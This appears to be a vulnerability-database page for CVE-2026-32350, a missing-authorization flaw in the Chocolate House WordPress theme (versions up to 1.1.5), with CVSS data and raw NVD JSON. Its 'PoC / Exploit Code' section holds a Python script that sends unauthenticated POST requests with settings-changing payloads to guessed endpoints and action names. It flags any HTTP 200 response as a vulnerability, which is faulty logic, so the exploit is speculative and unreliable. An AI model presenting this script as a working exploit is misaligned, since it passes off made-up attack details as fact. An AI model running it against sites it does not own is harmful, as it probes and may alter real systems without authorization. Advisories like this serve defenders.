Security Vulnerability Report
中文
CVE-2026-32350 CVSS 5.3 MEDIUM

CVE-2026-32350

Published: 2026-03-13 19:54:47
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in wpradiant Chocolate House chocolate-house allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Chocolate House: from n/a through <= 1.1.5.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Chocolate House Theme (WordPress) <= 1.1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-32350 PoC - Missing Authorization in Chocolate House Theme # Target: WordPress site with Chocolate House theme <= 1.1.5 target = "http://target-wordpress-site.com" # Identify vulnerable endpoints - typically admin-ajax.php or theme-specific routes vulnerable_endpoints = [ f"{target}/wp-admin/admin-ajax.php", f"{target}/wp-json/chocolate-house/v1/settings", f"{target}/?rest_route=/chocolate-house/v1/config" ] # Example vulnerable action (theme-specific) test_payloads = [ {"action": "chocolate_house_save_settings", "data": {"malicious_config": "value"}}, {"action": "chocolate_house_export_data", "format": "json"}, {"controller": "settings", "method": "update", "params": {"key": "value"}} ] print("[*] Testing CVE-2026-32350 - Missing Authorization") print(f"[*] Target: {target}") for endpoint in vulnerable_endpoints: for payload in test_payloads: try: # Send request WITHOUT authentication response = requests.post(endpoint, data=payload, timeout=10) # Check if request was successful (indicates missing auth check) if response.status_code == 200: print(f"[+] VULNERABLE: {endpoint}") print(f"[+] Payload: {payload}") print(f"[+] Response: {response.text[:200]}") except requests.exceptions.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") print("[*] Scan complete. If vulnerabilities found, update theme immediately.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32350", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:46.927", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in wpradiant Chocolate House chocolate-house allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Chocolate House: from n/a through <= 1.1.5."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en wpradiant Chocolate House chocolate-house permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Chocolate House: desde n/a hasta &lt;= 1.1.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/chocolate-house/vulnerability/wordpress-chocolate-house-theme-1-1-5-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}